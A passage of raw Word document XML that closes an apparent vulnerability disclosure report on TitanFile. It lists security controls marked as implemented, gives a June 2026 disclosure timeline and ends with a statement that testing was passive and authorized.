                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Session cookies: HttpOnly + Secure + SameSite=Lax</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Implemented</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
            <w:shd w:fill="f5f5f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>CSRF protection (Django csrfmiddlewaretoken)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
            <w:shd w:fill="f5f5f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Implemented</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Password reset does NOT enumerate users</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Implemented</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
            <w:shd w:fill="f5f5f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Login next parameter rejects external URLs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
            <w:shd w:fill="f5f5f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Implemented</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Nonce-based CSP on login page</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Implemented</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Appendix B — Disclosure Timeline</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="center"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4680"/>
        <w:gridCol w:w="4680"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
            <w:shd w:fill="1a1a2e" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
            <w:shd w:fill="1a1a2e" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Action</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
            <w:shd w:fill="f5f5f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>June 10, 2026</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
            <w:shd w:fill="f5f5f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Initial reconnaissance and vulnerability discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>June 11, 2026</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Source code audit, vulnerability chaining, and reverification</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
            <w:shd w:fill="f5f5f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>June 11, 2026</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
            <w:shd w:fill="f5f5f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Report prepared for submission</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>— End of Report —</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>This report was prepared in accordance with the TitanFile Vulnerability Disclosure Policy and the Open Bug Bounty program guidelines. All testing was conducted passively within the authorized scope. No user data was accessed, no denial of service was attempted, and no social engineering was employed.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